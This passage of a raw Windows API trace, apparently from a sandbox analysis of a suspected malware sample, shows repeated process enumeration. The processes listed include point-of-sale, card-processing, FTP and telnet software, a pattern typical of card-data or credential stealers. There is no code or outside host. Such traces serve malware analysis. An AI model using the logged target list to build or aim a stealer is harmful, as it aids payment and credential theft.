cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0228.617] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0228.620] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0228.622] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0228.625] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0228.627] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0228.629] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0228.632] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0228.634] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0228.636] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0228.638] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0228.640] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0228.642] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0228.644] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0228.646] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0228.692] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0228.694] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0228.696] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0228.697] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0228.699] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0228.701] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0228.703] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0228.705] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0228.707] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0228.709] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0228.711] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0228.713] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0228.714] CloseHandle (hObject=0x21fc) returned 1 [0228.714] Sleep (dwMilliseconds=0x64) [0228.836] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2200 [0228.849] Process32First (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.851] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0228.853] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0228.854] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.856] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0228.858] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.863] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0228.865] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0228.867] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0228.869] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.870] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.911] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0228.914] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.915] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.917] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.919] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.920] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.922] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.924] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.925] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0228.927] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0228.929] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.931] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0228.933] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.935] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0228.937] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0228.939] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0228.940] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0228.942] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0228.943] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0228.945] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.984] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.986] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0228.988] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.991] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.993] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0228.996] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0228.998] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0229.000] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0229.002] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0229.004] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0229.006] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0229.007] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0229.009] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0229.011] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0229.013] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0229.016] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0229.018] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0229.020] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0229.034] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0229.036] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0229.046] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0229.049] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0229.050] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0229.052] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0229.055] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0229.057] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0229.059] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, 